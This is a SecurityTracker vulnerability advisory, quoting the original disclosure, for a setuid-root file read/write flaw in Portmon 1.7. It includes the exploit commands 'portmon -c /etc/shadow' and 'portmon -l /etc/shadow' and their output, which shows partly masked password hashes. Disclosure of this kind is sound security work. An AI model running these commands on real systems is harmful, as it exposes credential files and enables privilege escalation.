Portmon Lets Local Users Read and Write Arbitrary Files With Root Privileges
|
|
SecurityTracker Alert ID: 1007010
|
|
CVE Reference: CAN-2003-0448
(Links to External Site)
|
Updated: Jan 8 2004
|
Original Entry Date: Jun 19 2003
|
Impact: Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information, Root access via local system
|
Exploit Included: Yes
|
Version(s): 1.7 and possibly prior versions
|
Description: A vulnerability was reported in Portmon. A local user can read from and write to arbitrary files on the system.
It is reported that a local user can invoke Portmon and specify a configuration file or log file command line option to view the
contents of or write to any file on the system. Because Portmon is typically configured with set user id (setuid) root privileges,
a local user can write files with root privileges to potentially gain root access on the system.
Some demonstration exploit commands
are provided:
portmon -c /etc/shadow
portmon -l /etc/shadow
|
Impact: A local user can read arbitrary files on the system. A local user can cause certain text to be written to arbitrary files on the system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: aboleo.net/software/portmon/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: Luca Ercoli <luca.ercoli@inwind.it>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: 16 Jun 2003 23:54:33 -0000
From: Luca Ercoli <luca.ercoli@inwind.it>
Subject: Portmon file arbitrary read/write access vulnerability
|
Package: Portmon
Auth: http://www.aboleo.net/
Version(s): 1.7 (prior ?)
Vulnerability: File arbitrary read/write access
vulnerability
Portmon is a network service monitoring daemon
(http://www.aboleo.net/software/portmon/).
"In order to use ping support, Portmon must run as root
or be installed setuid with root permissions
due to the fact that it must open up a raw socket."
The product suffer from a security problem that allows
any local user to read/write protected files on the system.
This is dude to a hole in the way the program handles
loading of two configuration files: host file/log file.
Example (read):
[lucae@linux lucae]$portmon -c /etc/shadow
Unable to resolve hostname
root:$1$nsqR6sX$ItXXXXXXXXXXXXXXXXX.:12172:0:99999:7:::
Unable to resolve hostname bin:*:12172:0:99999:7:::
Unable to resolve hostname daemon:*:12172:0:99999:7:::
Unable to resolve hostname adm:*:12172:0:99999:7:::
Unable to resolve hostname lp:*:12172:0:99999:7:::
Unable to resolve hostname sync:*:12172:0:99999:7:::
Unable to resolve hostname shutdown:*:12172:0:99999:7:::
Unable to resolve hostname halt:*:12172:0:99999:7:::
Unable to resolve hostname mail:*:12172:0:99999:7:::
Unable to resolve hostname news:*:12172:0:99999:7:::
<snip>
Example (write):
[lucae@linux lucae]$portmon -l /etc/shadow
fopen: No such file or directory
Failed reading config file hosts
[root@linux root]#cat /etc/shadow
<snip>
lucae:$1$w3IGpzV4$i8WcXXXXXXXXXXXXXXXX/:12172:0:99999:7:::
nessus:$1$XSaW3b5e$WWzXXXXXXXXXXXXXXXX.:12183:0:99999:7:::
test:$1$6r5/OoES$RX3OXXXXXXXXXXXXXXXX/:12200:0:99999:7:::
(Mon Jun 16 01:40:17 2003) - Portmon started by user
lucae //line added
[root@linux root]#
Luca Ercoli luca.ercoli[at]inwind.it
|
|
